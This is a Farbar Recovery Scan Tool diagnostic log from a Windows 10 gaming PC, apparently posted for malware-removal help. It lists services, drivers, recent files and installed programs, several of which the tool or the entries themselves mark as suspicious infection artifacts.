S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4069992 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-10-11] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2243528 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [175240 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 MacriumService; C:\Program Files\Macrium\Common\MacriumService.exe [5996880 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
S2 MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [256000 2020-08-28] () [File not signed]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3918680 2020-09-03] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\NisSrv.exe [1516320 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe [86088 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2020-09-11] () [File not signed]
S2 ekrn; "C:\Program Files\ESET\ESET Security\ekrn.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S1 16F618EAF6A0; C:\WINDOWS\16F618EAF6A0.sys [21784 2020-09-11] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
S3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [19525104 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [542192 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [38672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [51680 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [38512 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 LGBusEnum; C:\WINDOWS\system32\drivers\LGBusEnum.sys [32912 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [13672 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [63632 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 LGVirHid; C:\WINDOWS\system32\drivers\LGVirHid.sys [24856 2018-05-07] (Logitech Inc -> Logitech Inc.)
S1 MobiVBoxDrv; C:\Program Files\MobiGame\vbox\MobiVBoxDrv.sys [255640 2020-08-11] (Iron Entertainment Inc. -> Oracle Corporation)
S2 SecDrv; C:\WINDOWS\system32\drivers\SECDRV.SYS [28400 2020-09-25] () [File not signed]
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [39304 2020-10-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [332008 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [49376 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [7248 2020-09-11] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [18616 2020-09-11] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [28368 2020-09-11] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] <==== ATTENTION
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 22:08 - 2020-10-20 22:09 - 000018954 _____ C:\Users\42072\Desktop\FRST.txt
2020-10-20 22:08 - 2020-10-20 22:08 - 000000000 ____D C:\FRST
2020-10-20 22:07 - 2020-10-20 22:07 - 002013696 _____ (Farbar) C:\Users\42072\Desktop\FRST.exe
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\rsit
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\Program Files\trend micro
2020-10-20 16:52 - 2020-10-20 21:18 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-10-20 16:51 - 2020-10-20 16:51 - 000000000 ____D C:\WINDOWS\pss
2020-10-20 16:38 - 2020-10-20 16:46 - 000000000 ____D C:\Program Files\ESET
2020-10-20 16:34 - 2020-10-20 16:34 - 006333872 _____ (ESET) C:\Users\42072\Downloads\eset_internet_security_live_installer.exe
2020-10-20 16:26 - 2020-10-20 21:15 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eca8707e3f
2020-10-20 16:14 - 2020-10-20 16:22 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eaf808aca1
2020-10-20 16:10 - 2020-10-20 16:10 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6ea70046158
2020-10-20 16:03 - 2020-10-20 16:29 - 000129056 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae.sys
2020-10-20 16:02 - 2020-10-20 16:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-20 16:00 - 2020-10-20 16:00 - 002062144 _____ (Malwarebytes) C:\Users\42072\Downloads\MBSetup.exe
2020-10-20 16:00 - 2020-10-20 16:00 - 000000000 ____D C:\Program Files\Malwarebytes
2020-10-16 15:51 - 2020-10-16 15:51 - 000755728 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.5.exe
2020-10-16 15:41 - 2020-10-16 15:41 - 000000216 _____ C:\Users\42072\Desktop\SMITE - Public Test.url
2020-10-15 20:02 - 2020-10-15 20:02 - 000003460 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 20:02 - 2020-10-15 20:02 - 000003336 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 17:06 - 2020-10-13 17:06 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-12 12:47 - 2020-10-12 12:47 - 000000000 ____D C:\Users\42072\Documents\My Games
2020-10-12 12:04 - 2020-10-12 12:04 - 000000000 ____D C:\Users\42072\AppData\Roaming\EasyAntiCheat
2020-10-12 12:03 - 2020-10-12 12:04 - 000000000 ____D C:\Program Files\EasyAntiCheat
2020-10-11 12:39 - 2020-10-11 12:39 - 000755720 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.4.exe
2020-10-11 12:02 - 2020-10-16 15:41 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-11 12:02 - 2020-10-11 12:02 - 000000216 _____ C:\Users\42072\Desktop\SMITE.url
2020-10-11 11:36 - 2020-10-11 11:36 - 000000000 ____D C:\Users\42072\AppData\Local\Steam
2020-10-11 11:33 - 2020-10-20 15:36 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-10-11 11:32 - 2020-10-20 21:16 - 000000000 ____D C:\Program Files\Steam
2020-10-11 11:32 - 2020-10-11 11:32 - 001573568 _____ C:\Users\42072\Downloads\SteamSetup.exe
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\Users\Public\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\ProgramData\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-10 22:27 - 2020-10-10 22:27 - 000036044 _____ C:\Users\42072\Downloads\PVP-h.webp
2020-10-10 19:28 - 2020-10-10 22:06 - 1716267027 _____ C:\Users\42072\Downloads\Star-Wars-cast-1.cz-dabing.avi
2020-10-10 18:11 - 2020-10-10 18:11 - 000000000 ____D C:\Program Files\Common Files\Oracle
2020-10-10 18:10 - 2020-10-10 18:10 - 000000000 ____D C:\Program Files\Common Files\Java
2020-10-10 18:05 - 2020-10-10 19:03 - 1048576000 _____ C:\Users\42072\Downloads\Star Wars Epizoda I - Skrytá hrozba (1999).mkv.7z.004
2020-10-09 18:02 - 2020-10-09 18:02 - 067953134 _____ C:\Users\42072\Downloads\RiotClientServices.exe.ogdo
2020-10-09 16:28 - 2020-09-25 21:04 - 000000077 _____ C:\Users\42072\Desktop\pack.mcmeta
2020-10-09 15:14 - 2020-10-09 15:15 - 000000000 ____D C:\Users\42072\Desktop\hudebka
2020-10-09 15:10 - 2020-10-09 15:14 - 369135537 _____ C:\Users\42072\Downloads\zasilka-DK2W5P8NG9U6YNLM.zip
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\Users\Public\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\ProgramData\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000000000 ____D C:\WINDOWS\system32\directx
2020-09-27 15:01 - 2016-03-26 15:57 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam 2 CZ (v2.070)
2020-09-27 12:36 - 2020-09-27 15:00 - 2601257270 _____ C:\Users\42072\Downloads\Serious Sam 2 CZ (v2.070).rar
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\Users\Public\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\ProgramData\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:45 - 2020-09-26 19:47 - 000000000 ____D C:\Program Files\Serious Sam 3 BFE
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\party
2020-09-25 18:13 - 2020-09-25 18:13 - 000000000 ____D C:\Program Files\directx
2020-09-25 17:57 - 2020-09-25 17:57 - 000028400 _____ C:\WINDOWS\system32\Drivers\SECDRV.SYS
2020-09-25 17:54 - 2020-09-25 17:54 - 000001039 _____ C:\Users\42072\Desktop\GameSpy Arcade.lnk
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Program Files\GameSpy Arcade
2020-09-25 17:51 - 2020-09-27 15:03 - 000000000 ____D C:\Program Files\Croteam
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\Users\42072\AppData\Roaming\VEGAS
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\ProgramData\Magix
2020-09-25 17:16 - 2020-09-25 17:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-09-20 11:27 - 2020-09-20 11:27 - 112859648 _____ (Logitech Inc.) C:\Users\42072\Downloads\LGS_9.00.42_x86_Logitech.exe
2020-09-20 11:21 - 2020-09-20 11:22 - 113978120 _____ (Logicool Inc.) C:\Users\42072\Downloads\LGS_9.02.65_x86_Logicool.exe
2020-09-20 11:06 - 2020-09-20 11:07 - 036588168 _____ (Logitech, Inc.) C:\Users\42072\Downloads\lghub_installer.exe
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 21:21 - 2020-09-03 08:47 - 001605602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-10-20 21:21 - 2019-12-07 14:21 - 000682184 _____ C:\WINDOWS\system32\perfh005.dat
2020-10-20 21:21 - 2019-12-07 14:21 - 000137000 _____ C:\WINDOWS\system32\perfc005.dat
2020-10-20 21:21 - 2019-12-07 08:10 - 000000000 ____D C:\WINDOWS\INF
2020-10-20 21:17 - 2020-09-03 08:50 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-20 21:17 - 2020-09-03 08:40 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-20 21:17 - 2019-12-07 08:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-20 21:15 - 2020-09-03 08:50 - 000003572 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-20 21:15 - 2020-04-24 17:59 - 000000000 ____D C:\Users\42072\AppData\Local\LogMeIn Hamachi
2020-10-20 16:56 - 2020-09-11 18:30 - 000003270 _____ C:\WINDOWS\system32\Tasks\csrss
2020-10-20 16:56 - 2019-12-07 08:12 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-20 16:40 - 2019-12-07 08:12 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-20 16:35 - 2019-10-04 18:17 - 000000000 ____D C:\Users\42072\AppData\LocalLow\Mozilla
2020-10-20 16:32 - 2020-09-06 16:53 - 000000000 ____D C:\Users\42072\.MobiVBox
2020-10-20 16:30 - 2020-09-06 16:31 - 000000000 ____D C:\Users\42072\AppData\Local\MobiGame
2020-10-20 16:06 - 2020-09-03 08:50 - 000003448 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-20 15:59 - 2020-08-20 11:14 - 000007602 _____ C:\Users\42072\AppData\Local\Resmon.ResmonCfg
2020-10-20 15:55 - 2020-09-03 08:40 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-20 15:05 - 2020-09-03 08:08 - 000000000 ____D C:\Users\42072
2020-10-18 19:51 - 2020-09-06 17:13 - 000000000 ____D C:\Users\42072\AppData\Local\GeometryDash
2020-10-18 19:49 - 2019-10-04 18:40 - 000000000 ____D C:\Users\42072\AppData\Roaming\.minecraft
2020-10-18 19:02 - 2020-03-17 19:18 - 000000000 ____D C:\Users\42072\AppData\Roaming\lunarclient
2020-10-17 12:40 - 2019-12-07 08:12 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-17 12:39 - 2020-06-13 16:22 - 000002365 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-10-15 19:53 - 2020-09-02 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-14 20:43 - 2020-06-07 17:52 - 000000000 ____D C:\Program Files\R.G. Mechanics
2020-10-14 20:33 - 2019-12-07 14:39 - 000000000 ____D C:\Users\42072\AppData\Roaming\Spotify
2020-10-14 19:55 - 2020-05-19 11:17 - 000000000 ____D C:\Users\42072\AppData\Local\ElevatedDiagnostics
2020-10-13 17:06 - 2019-10-04 18:20 - 000001166 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-12 11:39 - 2019-10-04 17:12 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-10 18:11 - 2019-10-05 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-10-10 18:11 - 2019-10-05 11:59 - 000000000 ____D C:\Program Files\Java
2020-10-10 18:08 - 2019-10-05 12:00 - 000164008 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge.dll
2020-10-10 14:21 - 2019-10-04 16:40 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002247 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-02 16:15 - 2019-10-05 13:55 - 000000000 ____D C:\Users\42072\AppData\Roaming\TS3Client
2020-09-28 11:49 - 2019-10-04 18:17 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-25 21:50 - 2020-07-05 16:54 - 000000000 ____D C:\Users\42072\Desktop\assets
2020-09-25 18:20 - 2020-03-17 14:21 - 000000000 ____D C:\Program Files\Common Files\InstallShield
2020-09-25 18:19 - 2020-03-17 14:32 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2020-09-25 17:19 - 2020-06-05 22:24 - 000000000 ____D C:\Program Files\Logitech Gaming Software
2020-09-20 11:29 - 2020-07-10 19:33 - 000000000 ____D C:\Users\Public\Logi
==================== Files in the root of some directories ========
2020-09-11 18:26 - 2020-09-11 18:26 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-06-06 15:47 - 2017-06-27 17:26 - 000360779 _____ () C:\Users\42072\AppData\Roaming\BetterPvP_1.13.1.1_Forge_1.8.9.jar
2020-06-06 15:47 - 2018-03-10 12:06 - 000012002 _____ () C:\Users\42072\AppData\Roaming\MemoryFix-0.3.jar
2020-06-06 15:47 - 2017-11-21 18:52 - 000004306 _____ () C:\Users\42072\AppData\Roaming\MouseDelayFix-1.0.jar
2020-06-06 15:47 - 2017-01-07 22:50 - 000073014 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 Classloader FORGE MC1.8.9.jar
2020-06-06 15:47 - 2017-01-07 03:08 - 002261831 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 FORGE MC1.8.9.jar
2020-06-06 15:47 - 2018-04-20 16:30 - 002016181 _____ () C:\Users\42072\AppData\Roaming\OptiFine_1.8.9_HD_U_I7.jar
2020-06-06 15:47 - 2018-09-04 12:02 - 000073508 _____ () C:\Users\42072\AppData\Roaming\Orange's+Simple+Mods-1.2.jar
2020-06-06 15:47 - 2018-09-04 11:52 - 000015089 _____ () C:\Users\42072\AppData\Roaming\TimeChanger-1.0 (1.8.9).jar
2020-05-21 11:55 - 2020-05-22 10:43 - 000000035 _____ () C:\Users\42072\AppData\Roaming\WB.CFG
2020-06-06 15:47 - 2018-03-17 14:05 - 000062916 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] BetterFps-1.2.0.jar
2020-06-06 15:47 - 2018-03-17 13:51 - 000058995 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] FoamFixUnofficial.jar
2020-06-06 15:47 - 2018-03-04 16:59 - 000006718 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] NameChanger.jar
2020-06-06 15:47 - 2018-09-04 11:59 - 000026327 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] Powns Coords HUD - 1.0.jar
2020-06-06 15:47 - 2018-10-02 18:18 - 000024908 _____ () C:\Users\42072\AppData\Roaming\[v3] (1.8.9) canelex3keystrokes.jar
2020-09-11 18:32 - 2020-09-11 18:32 - 000000559 _____ () C:\Users\42072\AppData\Local\bowsakkdestx.txt
2020-08-20 11:14 - 2020-10-20 15:59 - 000007602 _____ () C:\Users\42072\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
safeboot: Minimal => The system is configured to boot to Safe Mode <==== ATTENTION
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 19-10-2020
Ran by 42072 (20-10-2020 22:10:00)
Running from C:\Users\42072\Desktop
Microsoft Windows 10 Pro Version 2004 19041.450 (X86) (2020-09-03 06:51:10)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
42072 (S-1-5-21-3093974370-3673700369-3101221773-1002 - Administrator - Enabled) => C:\Users\42072
Administrator (S-1-5-21-3093974370-3673700369-3101221773-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3093974370-3673700369-3101221773-503 - Limited - Disabled)
Guest (S-1-5-21-3093974370-3673700369-3101221773-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3093974370-3673700369-3101221773-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Catalyst Control Center (HKLM\...\WUCCCApp) (Version: 1.00.0000 - AMD)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.12.0.1152 - Disc Soft Ltd)
DiskFixer version 1.0 (HKLM\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
DNPlayer, версия 5.7.8.13 (HKLM\...\{51D1A917-78AE-4E70-B8DC-88412D7B7226}_is1) (Version: 5.7.8.13 - DNPlayer)
Duke Nukem - Manhattan Project (HKLM\...\{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment) Hidden
Duke Nukem - Manhattan Project (HKLM\...\InstallShield_{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment)
DVD Architect (HKLM\...\{1D8D144F-3558-11E9-A3D6-00155D6302F2}) (Version: 7.0.100 - VEGAS)
Epic Games Launcher (HKLM\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x86) (HKLM\...\{B633DAAD-9294-4C7D-A625-D5B741A8C2B6}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fraps (HKLM\...\Fraps) (Version: - )
GameSpy Arcade (HKLM\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 86.0.4240.75 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Chromium (HKLM\...\{F0FB183B-A07B-C9BB-11FB-B93BC17B6ABB}) (Version: - )
Java 8 Update 261 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Launcher Prerequisites (x86) (HKLM\...\{ec50c375-be9a-4642-9b8c-86dcc42e39c3}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.20.329 - Logitech)
LogMeIn Hamachi (HKLM\...\{ECC0FA07-863E-44BC-8B1D-DA22F96E5FB7}) (Version: 2.2.0.633 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.633 - LogMeIn, Inc.)
Lunar Client (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 2.3.5 - Moonsworth, LLC)
Macrium Reflect Free Edition (HKLM\...\{7488FFD6-2CB1-4A7B-A788-3BCA60A44E7D}) (Version: 7.2.5107 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 7.2 - Paramount Software (UK) Ltd.)
Microsoft Edge (HKLM\...\Microsoft Edge) (Version: 86.0.622.43 - Microsoft Corporation)
Microsoft Edge Update (HKLM\...\Microsoft Edge Update) (Version: 1.3.135.49 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft Launcher (HKLM\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
MobiGame (HKLM\...\{D400ECB0-A0E7-49EC-AF24-D449A4671D11}) (Version: 3.8.15.0 - MobiGame)
Mozilla Firefox 81.0.2 (x86 cs) (HKLM\...\Mozilla Firefox 81.0.2 (x86 cs)) (Version: 81.0.2 - Mozilla)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
OBS Studio (HKLM\...\OBS Studio) (Version: 25.0.8 - OBS Project)
Paragon Migrate OS to SSD™ (HKLM\...\{D4378A80-C713-11DF-9399-005056C00008}) (Version: 90.00.0003 - Paragon Software)
Pic version 10.2 (HKLM\...\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1) (Version: 10.2 - Pics)
pvk_5.4.2.3, версия 5.4.2.3 (HKLM\...\{212945B6-8BD1-4CBE-9399-685AB22FAB51}_is1) (Version: 5.4.2.3 - isp)
Serious Sam 2 verze 2.070 (HKLM\...\{C5E4298B-3581-4AAD-9FAF-2FE76C07EFC8}_is1) (Version: 2.070 - Croteam)
Serious Sam 3 BFE (HKLM\...\{97425B85-2311-435E-9A28-0AA11B41E322}_is1) (Version: - Croteam)
Seznam Software (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\SeznamInstall) (Version: 2.1.32 - Seznam.cz)
Spotify (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Spotify) (Version: 1.1.35.458.g891674f3 - Spotify AB)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Super Meat Boy v1.5 (HKLM\...\Super Meat Boy v1.5_is1) (Version: - Team Meat)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.0 - TeamSpeak Systems GmbH)
WinRAR 5.90 beta 3 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.3 - win.rar GmbH)
Packages:
=========
Doplněk multimediálního modulu pro aplikaci Fotografie -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x86__8wekyb3d8bbwe [2020-04-27] (Microsoft Corporation)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.2.0_neutral__8xx8rvfyw5nnt [2020-05-12] (Instagram)
Media Player Go -> C:\Program Files\WindowsApps\38806TusharKoshti.MediaPlayerGo_4.1.0.0_x86__8xyfwj0nb922c [2020-09-06] (Tushar Koshti)
